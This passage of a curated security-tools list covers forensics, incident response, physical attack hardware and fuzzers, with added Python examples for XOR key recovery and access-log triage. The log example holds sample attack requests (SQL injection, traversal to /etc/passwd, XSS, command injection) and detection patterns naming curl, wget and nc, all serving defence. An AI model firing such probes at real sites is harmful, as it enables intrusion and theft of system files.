  • VirtualDeobfuscator - Reverse engineering tool for virtualization wrappers.
  • VirusTotal - Online malware scanner.
  • Voltron - Extensible debugger UI toolkit written in Python.
  • WDK/WinDbg - Windows Driver Kit and WinDbg.
  • x64dbg - Open source x64/x32 debugger for Windows.
  • xortool - Tool for guessing XOR keys.
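
Several of the tools above (NoMoreXOR, unXOR, xortool) automate one idea: a short repeating XOR key does not hide the statistics of the plaintext, so every position that shares a key byte can be attacked as a single-byte substitution, and a known plaintext fragment gives the key directly. The block below is an added example of both techniques, not code from any of those projects; the plaintext, the key `b"K3y!\xa7"`, the frequency table and the tolerance in the key-length guess are constructed for the illustration.

```python
"""Repeating-key XOR recovery by frequency analysis (xortool-style) and by
known plaintext (unXOR-style). Added illustration; not code from either project."""
from itertools import cycle
from typing import Optional, Tuple

# Constructed sample: ASCII plaintext and a 5-byte key that includes a non-printable byte.
PLAINTEXT = (
    b"Malware authors often hide configuration data, strings and second stage payloads "
    b"behind a single byte or a short repeating XOR key. The key is cheap to apply and "
    b"just enough to defeat a naive strings run, but it leaves the statistics of the "
    b"plaintext intact. Every position that shares a key byte is a simple substitution, "
    b"so each column can be attacked on its own with letter frequencies, and a known "
    b"fragment of plaintext recovers the key directly."
)
KEY = b"K3y!\xa7"


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR data with key, repeating the key as needed."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


CIPHERTEXT = xor_bytes(PLAINTEXT, KEY)

# Approximate English letter frequencies (percent); space is the most common symbol in running text.
_ENGLISH = {
    " ": 13.0, "e": 12.7, "t": 9.1, "a": 8.2, "o": 7.5, "i": 7.0, "n": 6.7, "s": 6.3,
    "h": 6.1, "r": 6.0, "d": 4.3, "l": 4.0, "c": 2.8, "u": 2.8, "m": 2.4, "w": 2.4,
    "f": 2.2, "g": 2.0, "y": 2.0, "p": 1.9, "b": 1.5, "v": 1.0, "k": 0.8, "j": 0.2,
    "x": 0.2, "q": 0.1, "z": 0.1,
}


def english_score(data: bytes) -> float:
    """Higher is more English-like; control and non-ASCII bytes are heavily penalised."""
    score = 0.0
    for b in data:
        if b >= 0x7F or (b < 0x20 and b not in (0x09, 0x0A, 0x0D)):
            score -= 20.0
        else:
            score += _ENGLISH.get(chr(b).lower(), 0.0)
    return score


def best_single_byte_xor(column: bytes) -> Tuple[int, float]:
    """Try all 256 key bytes on one column and keep the most English-looking result."""
    best_key, best_score = 0, float("-inf")
    for k in range(256):
        s = english_score(bytes(b ^ k for b in column))
        if s > best_score:
            best_key, best_score = k, s
    return best_key, best_score


def guess_key_length(ct: bytes, max_len: int = 16) -> int:
    """Score each candidate length by how English its columns decrypt to.
    Multiples of the true length decrypt identically, so return the shortest
    length whose score is within 2% of the best (tolerance chosen for this example)."""
    scores = {}
    for klen in range(1, max_len + 1):
        scores[klen] = sum(best_single_byte_xor(ct[i::klen])[1] for i in range(klen))
    best = max(scores.values())
    return min(k for k, s in scores.items() if s >= best - abs(best) * 0.02)


def recover_key(ct: bytes, klen: int) -> bytes:
    """Every klen-th byte shares one key byte, so each column is a single-byte XOR."""
    return bytes(best_single_byte_xor(ct[i::klen])[0] for i in range(klen))


def key_from_crib(ct: bytes, crib: bytes, klen: int) -> Optional[bytes]:
    """Known-plaintext attack: slide the crib over the ciphertext. Where the crib is
    aligned, window XOR crib is the key stream, which repeats with period klen."""
    if len(crib) < 2 * klen:
        raise ValueError("crib must span at least two key periods")
    for off in range(len(ct) - len(crib) + 1):
        stream = xor_bytes(ct[off:off + len(crib)], crib)
        if all(stream[j] == stream[j + klen] for j in range(len(stream) - klen)):
            key = bytearray(klen)
            for j in range(klen):
                key[(off + j) % klen] = stream[j]   # rotate into position-0 alignment
            return bytes(key)
    return None


if __name__ == "__main__":
    klen = guess_key_length(CIPHERTEXT)
    key = recover_key(CIPHERTEXT, klen)
    print(f"key length {klen}, key {key!r}")
    print(xor_bytes(CIPHERTEXT, key)[:60])
    print(key_from_crib(CIPHERTEXT, b"a known fragment of plaintext", klen))
```

The frequency attack needs enough bytes per column (a few dozen with spaces in them) to be reliable; on a short blob, or one that is not text, the known-plaintext path is the one to reach for, using a string you expect in the decoded output such as a PE header or a URL.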

Side-channel Tools

  • ChipWhisperer - Complete open-source toolchain for side-channel power analysis and glitching attacks.

Forensic Tools

Memory Analysis

  • Evolve - Web interface for Volatility advanced memory forensics framework.
  • inVtero.net - Windows x64 memory analysis tool.
  • Linux Memory Extractor (LiME) - A Loadable Kernel Module (LKM) allowing for volatile memory extraction of Linux-based systems.
  • Memoryze - Memory forensics software.
  • Microsoft User Mode Process Dumping - Dumps the memory image of any running Win32 process on the fly.
  • PMDump - Tool for dumping memory contents of a process without stopping the process.
  • Rekall - Open source tool and library for the extraction of digital artifacts from volatile memory (RAM) samples.
  • Responder PRO - Commercial memory analysis software.
  • Volatility - Advanced memory forensics framework.
  • VolatilityBot - Automation tool utilizing Volatility.
  • VolDiff - Malware Memory Footprint Analysis based on Volatility.
  • WindowsSCOPE - Commercial memory forensics software for Windows systems.

Memory Imaging Tools

  • Belkasoft Live RAM Capturer - A tiny free forensic tool to reliably extract the entire content of the computer’s volatile memory – even if protected by an active anti-debugging or anti-dumping system.
  • Linux Memory Grabber - A script for dumping Linux memory and creating Volatility profiles.
  • Magnet RAM Capture - Magnet RAM Capture is a free imaging tool designed to capture the physical memory of a suspect’s computer. Supports recent versions of Windows.
  • OSForensics - OSForensics can acquire live memory on 32bit and 64bit systems. A dump of an individual process’s memory space or physical memory dump can be done.

Incident Response

Honeypot Tools

Monitoring and IDS-IPS

  • AIEngine - Very advanced NIDS.
  • Elastic Stack - Also known as the ELK stack, the combination of Elasticsearch, Logstash, and Kibana, for monitoring and logging.
  • OSSEC - Open source HIDS.
  • Security Onion - Linux distro for monitoring.
  • Snort - Open source NIPS/NIDS.
  • SSHWATCH - SSH IPS.
  • Suricata - Open source NIPS/NIDS.

Physical Tools

  • LAN Turtle - Covert "USB Ethernet Adapter" that provides remote access, network intelligence gathering, and MITM capabilities when installed in a local network.
  • PCILeech - Uses PCIe hardware devices to read and write from the target system memory via Direct Memory Access (DMA) over PCIe.
  • Poisontap - Siphons cookies, exposes internal (LAN-side) router and installs web backdoor on locked computers.
  • Proxmark3 - RFID/NFC cloning, replay, and spoofing toolkit often used for analyzing and attacking proximity cards/readers, wireless keys/keyfobs, and more.
  • USB Rubber Ducky - Customizable keystroke injection attack platform masquerading as a USB thumbdrive.
  • WiFi Pineapple - Wireless auditing and penetration testing platform.

Adversary Emulation

  • APTSimulator - A Windows Batch script that uses a set of tools and output files to make a system look as if it was compromised.
  • Atomic Red Team (https://github.com/redcanaryco/atomic-red-team) - Small and highly portable detection tests mapped to the MITRE ATT&CK framework.
  • AutoTTP - Automated Tactics, Techniques & Procedures. Re-runs complex attack sequences that would otherwise be repeated by hand, for regression tests, product evaluations and generating data for researchers.
  • Blue Team Training Toolkit (https://www.bt3.no/) - Software for defensive security training, which will bring your network analysis training sessions, incident response drills and red team engagements to a new level.
  • Caldera - An automated adversary emulation system that performs post-compromise adversarial behavior within Windows enterprise networks. It generates plans during operation using a planning system and a pre-configured adversary model based on the Adversarial Tactics, Techniques & Common Knowledge (ATT&CK) project.
  • DumpsterFire - The DumpsterFire Toolset is a modular, menu-driven, cross-platform tool for building repeatable, time-delayed, distributed security events. Easily create custom event chains for Blue Team drills and sensor / alert mapping. Red Teams can create decoy incidents, distractions, and lures to support and scale their operations.
  • Metta - An information security preparedness tool to do adversarial simulation.
  • Network Flight Simulator - flightsim is a lightweight utility used to generate malicious network traffic and help security teams to evaluate security controls and network visibility.
  • Red Team Automation (https://github.com/endgameinc/RTA) - RTA provides a framework of scripts designed to allow blue teams to test their detection capabilities against malicious tradecraft, modeled after MITRE ATT&CK.
  • RedHunt-OS - A virtual machine for adversary emulation and threat hunting.

All in one Incident Response Tools

  • Belkasoft Evidence Center - The toolkit will quickly extract digital evidence from multiple sources by analyzing hard drives, drive images, memory dumps, iOS, Blackberry and Android backups, UFED, JTAG and chip-off dumps.
  • CimSweep - CimSweep is a suite of CIM/WMI-based tools that enable the ability to perform incident response and hunting operations remotely across all versions of Windows.
  • CIRTkit - CIRTKit is not just a collection of tools, but also a framework to aid in the ongoing unification of Incident Response and Forensics investigation processes.
  • Cyber Triage - Cyber Triage remotely collects and analyzes endpoint data to help determine if it is compromised. Its agentless approach and focus on ease of use and automation allow companies to respond without major infrastructure changes and without a team of forensics experts. Its results are used to decide if the system should be erased or investigated further.
  • Digital Forensics Framework - DFF is an open source computer forensics platform built on top of a dedicated Application Programming Interface. DFF proposes an alternative to the aging digital forensics solutions used today. Designed for simple use and automation, the DFF interface guides the user through the main steps of a digital investigation, so both professionals and non-experts can quickly and easily conduct digital investigations and perform incident response.
  • Doorman - Doorman is an osquery fleet manager that allows remote management of osquery configurations retrieved by nodes. It takes advantage of osquery's TLS configuration, logger, and distributed read/write endpoints, to give administrators visibility across a fleet of devices with minimal overhead and intrusiveness.
  • Envdb - Envdb turns your production, dev, cloud, etc environments into a database cluster you can search using osquery as the foundation. It wraps the osquery process with a cluster node agent that can communicate back to a central location.
  • Falcon Orchestrator - Falcon Orchestrator by CrowdStrike is an extendable Windows-based application that provides workflow automation, case management and security response functionality.
  • GRR Rapid Response - GRR Rapid Response is an incident response framework focused on remote live forensics. It consists of a python agent client that is installed on target systems, and a python server infrastructure that can manage and talk to the agent.
  • Kolide Fleet - Kolide Fleet is a state of the art host monitoring platform tailored for security experts. Leveraging Facebook's battle-tested osquery project, Kolide delivers fast answers to big questions.
  • Limacharlie - an endpoint security platform. It is itself a collection of small projects all working together, and gives you a cross-platform, Windows, OSX, Linux, Android and iOS, low-level environment allowing you to manage and push additional modules into memory to extend its functionality.
  • MIG - Mozilla Investigator, MIG, is a platform to perform investigative surgery on remote endpoints. It enables investigators to obtain information from large numbers of systems in parallel, thus accelerating investigation of incidents and day-to-day operations security.
  • MozDef - The Mozilla Defense Platform, MozDef, seeks to automate the security incident handling process and facilitate the real-time activities of incident handlers.
  • nightHawk - The nightHawk Response Platform is an application built for asynchronous forensic data presentation using Elasticsearch as the backend. It's designed to ingest Redline collections.
  • Open Computer Forensics Architecture - Open Computer Forensics Architecture, OCFA, is another popular distributed open-source computer forensics framework. This framework was built on Linux platform and uses postgreSQL database for storing data.
  • Osquery - With osquery you can easily ask questions about your Linux and OSX infrastructure. Whether your goal is intrusion detection, infrastructure reliability, or compliance, osquery gives you the ability to empower and inform a broad set of organizations within your company. Queries in the incident-response pack help you detect and respond to breaches.
  • Redline - provides host investigative capabilities to users to find signs of malicious activity through memory and file analysis, and the development of a threat assessment profile.
  • The Sleuth Kit & Autopsy - The Sleuth Kit is a Unix and Windows based toolkit that helps with forensic analysis of computers. It comes with various tools that help in digital forensics: analyzing disk images, performing in-depth analysis of file systems, and more.
  • TheHive - TheHive is a scalable 3-in-1 open source and free solution designed to make life easier for SOCs, CSIRTs, CERTs and any information security practitioner dealing with security incidents that need to be investigated and acted upon swiftly.
  • X-Ways Forensics - X-Ways is a forensics tool for Disk cloning and imaging. It can be used to find deleted files and disk analysis.
  • Zentral - combines osquery's powerful endpoint inventory features with a flexible notification and action framework. This enables one to identify and react to changes on OS X and Linux clients.

Disk Image Creation Tools

  • AccessData FTK Imager - AccessData FTK Imager is a forensics tool whose main purpose is to preview recoverable data from a disk of any kind. FTK Imager can also acquire live memory and paging file on 32bit and 64bit systems.
  • Bitscout - Bitscout by Vitaly Kamluk helps you build your fully-trusted customizable LiveCD/LiveUSB image to be used for remote digital forensics, or perhaps any other task of your choice. It is meant to be transparent and monitorable by the owner of the system, forensically sound, customizable and compact.
  • GetData Forensic Imager - GetData Forensic Imager is a Windows based program that will acquire, convert, or verify a forensic image in one of the following common forensic file formats.
  • Guymager - Guymager is a free forensic imager for media acquisition on Linux.
  • Magnet ACQUIRE - ACQUIRE by Magnet Forensics allows various types of disk acquisitions to be performed on Windows, Linux, and OS X as well as mobile operating systems.

Evidence Collection Tools

  • Bulk_extractor - bulk_extractor is a computer forensics tool that scans a disk image, a file, or a directory of files and extracts useful information without parsing the file system or file system structures. Because of ignoring the file system structure, the program distinguishes itself in terms of speed and thoroughness.
  • Cold Disk Quick Response - Uses a streamlined list of parsers to quickly analyze a forensic image file (dd, E01, .vmdk, etc.) and output nine reports.
  • Ir-rescue - ir-rescue is a Windows Batch script and a Unix Bash script to comprehensively collect host forensic data during incident response.
  • Live Response Collection - The Live Response Collection by BriMor Labs is an automated tool that collects volatile data from Windows, OSX, and *nix based operating systems.

Incident Management Tools

  • Cortex XSOAR - Security orchestration tool. Formerly Demisto community edition. Offers full Incident lifecycle management, Incident Closure Reports, team assignments and collaboration, and many integrations to enhance automations, like Active Directory, PagerDuty, Jira and much more.
  • CyberCPR - A community and commercial incident management tool with Need-to-Know built in to support GDPR compliance while handling sensitive incidents.
  • Cyphon - Cyphon eliminates the headaches of incident management by streamlining a multitude of related tasks through a single platform. It receives, processes and triages events to provide an all-encompassing solution for your analytic workflow — aggregating data, bundling and prioritizing alerts, and empowering analysts to investigate and document incidents.
  • FIR - Fast Incident Response, FIR, is a cybersecurity incident management platform designed with agility and speed in mind. It allows for easy creation, tracking, and reporting of cybersecurity incidents and is useful for CSIRTs, CERTs and SOCs alike.
  • RTIR - Request Tracker for Incident Response, RTIR, is the premier open source incident handling system targeted at computer security teams. Its developers worked with over a dozen CERT and CSIRT teams around the world to help handle the ever-increasing volume of incident reports. RTIR builds on all the features of Request Tracker.
  • SCOT - Sandia Cyber Omni Tracker, SCOT, is an incident response collaboration and knowledge capture tool focused on flexibility and ease of use. Its goal is to add value to the incident response process without burdening the user.
  • Threat_note - A lightweight investigation notebook that allows security researchers the ability to register and retrieve indicators related to their research.

Linux Forensics Distributions

  • ADIA - The Appliance for Digital Investigation and Analysis, ADIA, is a VMware-based appliance used for digital investigation and acquisition and is built entirely from public domain software. Among the tools contained in ADIA are Autopsy, the Sleuth Kit, the Digital Forensics Framework, log2timeline, Xplico, and Wireshark. Most of the system maintenance uses Webmin. It is designed for small-to-medium sized digital investigations and acquisitions. The appliance runs under Linux, Windows, and Mac OS. Both i386 32-bit and x86_64 versions are available.
  • CAINE - The Computer Aided Investigative Environment, CAINE, contains numerous tools that help investigators during their analysis, including forensic evidence collection.
  • CCF-VM - CyLR CDQR Forensics Virtual Machine, CCF-VM: an all-in-one solution for parsing collected data, making it easily searchable with built-in common searches, and enabling searches across single or multiple hosts simultaneously.
  • DEFT - The Digital Evidence & Forensics Toolkit, DEFT, is a Linux distribution made for computer forensic evidence collection. It comes bundled with the Digital Advanced Response Toolkit, DART, for Windows. A light version of DEFT, called DEFT Zero, is also available, which is focused primarily on forensically sound evidence collection.
  • NST - Network Security Toolkit - Linux distribution that includes a vast collection of best-of-breed open source network security applications useful to the network security professional.
  • PALADIN - PALADIN is a modified Linux distribution to perform various forensics tasks in a forensically sound manner. It comes with many open source forensics tools included.
  • Security Onion - Security Onion is a special Linux distro aimed at network security monitoring featuring advanced analysis tools.
  • SIFT Workstation - The SANS Investigative Forensic Toolkit, SIFT, Workstation demonstrates that advanced incident response capabilities and deep dive digital forensic techniques to intrusions can be accomplished using cutting-edge open-source tools that are freely available and frequently updated.

Linux Evidence Collection

  • FastIR Collector Linux - FastIR for Linux collects different artefacts on live Linux and records the results in csv files.

Log Analysis Tools

  • Logdissect - A CLI utility and Python API for analyzing log files and other data.
  • Lorg - a tool for advanced HTTPD logfile security analysis and forensics.
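
What a Lorg-style HTTPD log analysis does, reduced to its core: parse the combined log format, URL-decode the request path (repeatedly, because attackers double-encode to slip past single-pass filters), match the decoded request against a signature set, and rank clients by hits. The block below is an added example, not Lorg's code; the log lines are constructed and the four signatures are deliberately small and illustrative.

```python
"""Security triage of an Apache/Nginx combined-format access log. Added illustration;
not code from Lorg. SAMPLE_LOG is constructed, not real traffic."""
import re
from collections import Counter
from typing import Dict, List, Optional
from urllib.parse import unquote_plus

# Combined log format: ip ident user [ts] "method path proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Small, high-confidence patterns for the example; a real deployment would use a fuller ruleset.
SIGNATURES = [
    ("sqli", re.compile(r"(?i)(\bunion\b.+\bselect\b|'\s*or\s+\d+\s*=\s*\d+|--\s*$|\bsleep\(\d+\))")),
    ("traversal", re.compile(r"(\.\./){2,}|/etc/passwd")),
    ("xss", re.compile(r"(?i)<script|javascript:|onerror\s*=")),
    ("rce", re.compile(r"(?i)(;|\|\||&&)\s*(cat|wget|curl|nc|bash|sh)\b")),
]

# Constructed sample: two benign requests and five probes, one of them double-encoded.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Oct/2023:13:55:40 +0000] "GET /products.php?id=1%27%20OR%201%3D1-- HTTP/1.1" 200 5120 "-" "sqlmap/1.7"
198.51.100.7 - - [10/Oct/2023:13:55:41 +0000] "GET /download?file=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 404 209 "-" "curl/8.0"
192.0.2.44 - - [10/Oct/2023:13:56:02 +0000] "GET /search?q=%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1" 200 880 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Oct/2023:13:56:10 +0000] "GET /static/%252e%252e/%252e%252e/etc/passwd HTTP/1.1" 403 199 "-" "curl/8.0"
203.0.113.5 - - [10/Oct/2023:13:56:30 +0000] "POST /login HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.0.2.44 - - [10/Oct/2023:13:57:01 +0000] "GET /cgi-bin/ping.sh?host=127.0.0.1;cat%20/etc/passwd HTTP/1.1" 500 312 "-" "python-requests/2.31"
"""


def decode(value: str, rounds: int = 3) -> str:
    """URL-decode until the value stops changing (bounded), so %252e%252e becomes '..'."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def parse_line(line: str) -> Optional[Dict]:
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def classify(path: str) -> List[str]:
    """Names of the signatures that match the decoded request path, in SIGNATURES order."""
    decoded = decode(path)
    return [name for name, rx in SIGNATURES if rx.search(decoded)]


def analyze(log_text: str) -> List[Dict]:
    """Parse every line and keep those that match at least one signature."""
    findings = []
    for line in log_text.strip().splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        tags = classify(rec["path"])
        if tags:
            findings.append({**rec, "tags": tags})
    return findings


def suspicious_clients(findings: List[Dict]) -> Counter:
    """Hit count per source IP, the first thing to pivot on during triage."""
    return Counter(f["ip"] for f in findings)


if __name__ == "__main__":
    hits = analyze(SAMPLE_LOG)
    for h in hits:
        print(h["ip"], h["status"], h["tags"], decode(h["path"]))
    print(suspicious_clients(hits).most_common())
```

Matching only on the decoded request is the point of the `decode` loop: the double-encoded `%252e%252e` line matches nothing as written in the log and is only caught after the second decoding pass. The bound on decoding rounds keeps a pathological input from looping, and in practice the response status is worth keeping beside the match, since a 200 on a traversal probe means something different from a 403.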

OSX Evidence Collection

  • Knockknock - Displays persistent items, scripts, commands, binaries, etc., that are set to execute automatically on OSX.
  • Mac_apt - macOS Artifact Parsing Tool - Plugin based forensics framework for quick mac triage that works on live machines, disk images or individual artifact files.
  • OSX Auditor - OSX Auditor is a free Mac OS X computer forensics tool.
  • OSX Collector - An OSX Auditor offshoot for live response.

Incident Response Playbooks

  • IR Workflow Gallery - Different generic incident response workflows, e.g. for malware outbreak, data theft, unauthorized access, etc. Every workflow consists of seven steps: prepare, detect, analyze, contain, eradicate, recover, post-incident handling.
  • IRM - Incident Response Methodologies by CERT Societe Generale.
  • PagerDuty Incident Response Documentation - Documents that describe parts of the PagerDuty Incident Response process. It provides information not only on preparing for an incident, but also what to do during and after.

Process Dump Tools

Sandboxing/reversing tools

  • Cuckoo - Open source, highly configurable sandboxing tool.
  • Cuckoo-modified - Heavily modified Cuckoo fork developed by community.
  • Cuckoo-modified-api - A Python library to control a cuckoo-modified sandbox.
  • Hybrid-Analysis - Hybrid-Analysis is a free powerful online sandbox by Payload Security.
  • Malwr - Malwr is a free online malware analysis service and community, which is powered by the Cuckoo Sandbox.
  • Mastiff - MASTIFF is a static analysis framework that automates the process of extracting key characteristics from a number of different file formats.
  • Metadefender Cloud - Metadefender is a free threat intelligence platform providing multiscanning, data sanitization and vulnerability assessment of files.
  • Viper - Viper is a Python-based binary analysis and management framework that works well with Cuckoo and YARA.
  • Virustotal - Virustotal, a subsidiary of Google, is a free online service that analyzes files and URLs enabling the identification of viruses, worms, trojans and other kinds of malicious content detected by antivirus engines and website scanners.
  • Visualize_Logs - Open source. Visualization library and command line tools for logs.

Timeline tools

  • Highlighter - Free tool from FireEye/Mandiant that renders a log or text file graphically and highlights the areas that correspond to a keyword or phrase. Good for timelining an infection and what was done post-compromise.
  • Morgue - A PHP Web app by Etsy for managing postmortems.
  • Plaso - a Python-based backend engine for the tool log2timeline.
  • Timesketch - open source tool for collaborative forensic timeline analysis.

Windows Evidence Collection

  • AChoir - Achoir is a framework/scripting tool to standardize and simplify the process of scripting live acquisition utilities for Windows.
  • Binaryforay - List of free tools for Windows forensics.
  • Crowd Response - Crowd Response by CrowdStrike is a lightweight Windows console application designed to aid in the gathering of system information for incident response and security engagements. It features numerous modules and output formats.
  • FastIR Collector - FastIR Collector is a tool that collects different artefacts on live Windows systems and records the results in csv files. With the analyses of these artefacts, an early compromise can be detected.
  • FECT - Fast Evidence Collector Toolkit, FECT, is a light incident response toolkit to collect evidence on a suspicious Windows computer. Basically it is intended to be used by non-tech-savvy people working with a journeyman incident handler.
  • Fibratus - tool for exploration and tracing of the Windows kernel.
  • IREC - All-in-one IR Evidence Collector which captures RAM Image, $MFT, EventLogs, WMI Scripts, Registry Hives, System Restore Points and much more. It is FREE, lightning fast and easy to use.
  • IOC Finder - IOC Finder is a free tool from Mandiant for collecting host system data and reporting the presence of Indicators of Compromise. Support for Windows only.
  • LOKI - Loki is a free IR scanner for scanning endpoints with YARA rules and other indicators.
  • Panorama - Fast incident overview on live Windows systems.
  • PowerForensics - Live disk forensics platform, using PowerShell.
  • PSRecon - PSRecon gathers data from a remote Windows host using PowerShell (v2 or later), organizes the data into folders, hashes all extracted data, hashes PowerShell and various system properties, and sends the data off to the security team. The data can be pushed to a share, sent over email, or retained locally.
  • RegRipper - RegRipper is an open source tool, written in Perl, for extracting/parsing information, keys, values, and data from the Registry and presenting it for analysis.
  • TRIAGE-IR - Triage-IR is an IR collector for Windows.

Other

  • BruteX Wordlists - Wordlist repo.
  • Cortex - Cortex allows you to analyze observables such as IP and email addresses, URLs, domain names, files or hashes one by one or in bulk mode using a Web interface. Analysts can also automate these operations using its REST API.
  • Crits - A web-based tool which combines an analytic engine with a cyber threat database.
  • Diffy - A DFIR tool developed by Netflix's SIRT that allows an investigator to quickly scope a compromise across cloud instances (Linux instances on AWS, currently) during an incident and efficiently triage those instances for follow-up actions by showing differences against a baseline.
  • domfind - domfind is a Python DNS crawler for finding identical domain names under different TLDs.
  • Fenrir - Fenrir is a simple IOC scanner. It allows scanning any Linux/Unix/OSX system for IOCs in plain bash. Created by the creators of THOR and LOKI.
  • Fileintel - Pull intelligence per file hash.
  • fuzzbox - Multi-codec media fuzzing tool.
  • Google Hacking Master List
  • HELK - Threat Hunting platform.
  • Hindsight - Internet history forensics for Google Chrome/Chromium.
  • honggfuzz - Security orientated fuzzing tool.
  • Hostintel - Pull intelligence per host.
  • imagemounter - Command line utility and Python package to ease the (un)mounting of forensic disk images.
  • Kansa - Kansa is a modular incident response framework in Powershell.
  • Kayak - Car hacking tool for CAN bus diagnosis and monitoring.
  • melkor-android - Android fuzzing tool for ELF file formats.
  • Netzob - Multipurpose tool for reverse engineering, modeling, and fuzzing communication protocols.
  • radamsa - General-purpose fuzzer.
  • RaQet - RaQet is an unconventional remote acquisition and triage tool that allows triage of a disk of a remote computer (client) that is restarted with a purpose-built forensic operating system.
  • rastrea2r - Allows scanning disks and memory for IOCs using YARA on Windows, Linux and OS X.
  • ROPgadget - Python-based tool to help with ROP exploitation.
  • Shellen - Interactive shellcoding environment.
  • sqhunter - A threat hunter based on osquery and Salt Open (SaltStack) that can issue ad-hoc or distributed queries without the need for osquery's tls plugin. sqhunter allows you to query open network sockets and check them against threat intelligence sources.
  • Stalk - Collect forensic data about MySQL when problems occur.
  • Stenographer - Stenographer is a packet capture solution which aims to quickly spool all packets to disk, then provide simple, fast access to subsets of those packets. It stores as much history as it possibly can, managing disk usage, and deleting when disk limits are hit. It is ideal for capturing the traffic just before and during an incident, without the explicit need to store all of the network traffic.
  • Sulley - Fuzzer engine and framework.
  • traceroute-circl - traceroute-circl is an extended traceroute to support the activities of CSIRT (or CERT) operators. Usually CSIRT teams have to handle incidents based on IP addresses received. Created by Computer Emergency Response Center Luxembourg.
  • Zulu - Interactive fuzzer.

Open Source Tools

  • Legion - Legion is an open source, easy-to-use, super-extensible and semi-automated network penetration testing tool that aids in discovery, reconnaissance and exploitation of information systems.

License

This work is licensed under a Creative Commons Attribution 4.0 International License.